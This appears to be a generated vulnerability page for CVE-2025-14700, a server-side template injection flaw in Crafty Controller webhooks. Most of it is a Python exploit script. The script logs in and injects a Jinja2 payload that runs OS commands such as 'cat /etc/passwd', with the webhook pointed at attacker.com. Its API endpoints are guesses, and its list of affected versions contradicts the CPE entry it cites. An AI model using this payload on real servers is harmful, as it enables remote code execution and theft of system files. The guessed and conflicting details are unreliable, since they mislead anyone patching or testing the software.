Security Vulnerability Report
CVE-2025-14700 CVSS 9.9 CRITICAL

CVE-2025-14700

Published: 2025-12-17 01:16:00
Last Modified: 2025-12-23 21:17:59

Description

An input neutralization vulnerability in the Webhook Template component of Crafty Controller allows a remote, authenticated attacker to perform remote code execution via Server Side Template Injection.

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:craftycontrol:crafty_controller:4.6.1:*:*:*:*:*:*:* - VULNERABLE
Crafty Controller < 4.x.x (fixed version)
Crafty Controller 3.x.x (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14700 SSTI PoC for Crafty Controller
# Target: Crafty Controller < fixed version
# Vulnerability: Server Side Template Injection in Webhook Template

import requests
import json
import sys

TARGET_URL = "http://target:8000"
USERNAME = "attacker"
PASSWORD = "password"

# SSTI payload to execute system command
# Using Jinja2 template injection technique
SSTI_PAYLOAD = "{{ ''.__class__.__mro__[1].__subclasses__() }}"

# Better RCE payload for Jinja2
RCE_PAYLOAD = """
{{ config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read() }}
"""


def exploit(target_url, username, password, command="id"):
    """Execute command via SSTI in Crafty Controller"""
    session = requests.Session()

    # Step 1: Login to get authentication
    login_url = f"{target_url}/api/login"
    login_data = {"username": username, "password": password}

    try:
        response = session.post(login_url, json=login_data, timeout=10)
        if response.status_code != 200:
            print(f"[-] Login failed: {response.status_code}")
            return None
        print("[+] Login successful")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

    # Step 2: Find webhook template configuration endpoint
    # Typically: /api/webhooks or /api/settings/webhook
    webhook_url = f"{target_url}/api/webhooks"

    # Step 3: Inject SSTI payload into webhook template
    # RCE payload using Jinja2
    rce_payload = f"""{{{{ config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('{command}').read() }}}}"""

    webhook_data = {
        "name": "Malicious Webhook",
        "template": rce_payload,
        "url": "http://attacker.com/webhook"
    }

    try:
        response = session.post(webhook_url, json=webhook_data, timeout=10)
        print(f"[*] Sent SSTI payload: {response.status_code}")
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        command = sys.argv[1]
    else:
        command = "cat /etc/passwd"

    result = exploit(TARGET_URL, USERNAME, PASSWORD, command)
    if result:
        print(f"[+] Result:\n{result}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14700", "sourceIdentifier": "[email protected]", "published": "2025-12-17T01:15:59.620", "lastModified": "2025-12-23T21:17:59.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An input neutralization vulnerability in the Webhook Template component of Crafty Controller allows a remote, authenticated attacker to perform remote code execution via Server Side Template Injection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftycontrol:crafty_controller:4.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "EB974C32-2201-4E3F-87D8-057CA9108B1A"}]}]}], "references": [{"url": "https://gitlab.com/crafty-controller/crafty-4/-/issues/646", "source": "[email protected]", "tags": ["Broken Link"]}]}}